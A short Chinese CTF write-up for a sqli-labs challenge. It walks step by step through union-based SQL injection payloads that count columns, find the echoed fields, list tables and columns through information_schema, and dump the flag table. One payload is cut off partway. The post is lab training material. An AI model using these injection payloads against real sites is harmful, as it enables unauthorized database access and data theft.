青少年CTF平台---sqli-labs

鲤鱼 · 发布于 2023-3-8 23:02:14

![](https://img-blog.csdnimg.cn/b3a606939ad148828b39895607d7eb29.png)
##题目:sqli-labs

#考点sql注入

打开题目

先查找字段数(id=1' order by 3 --+)

到4的时候会返回错误信息
![](https://img-blog.csdnimg.cn/029befeec2c14094aeba9bbe2b8009ff.png)
发现有3个字段
 
判断回显点(?id=-1' union select 1,2,3 --+
![](https://img-blog.csdnimg.cn/94182c1f314c498b872d3737211ad0c1.png)
![](https://img-blog.csdnimg.cn/ddcc6bae65f84fd3af773b104f4fe9b4.jpeg)
 然后看数据库的名字(id=-1' union select 1,database(),3 --+)
 ![](https://img-blog.csdnimg.cn/a1e512cef9724c26b287c5e7ee12bf9b.png)
 发现数据库是(security)

查找数据库的表名(id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=
![](https://img-blog.csdnimg.cn/5d73bac9dee44132b4a70b8f28f868f9.png)
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+) 
![](https://img-blog.csdnimg.cn/e53e642312f14f529dbbbddd14a925f2.png)
查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)
![](https://img-blog.csdnimg.cn/38b808f27dcd4461a1599718b3133da8.png)
得到flag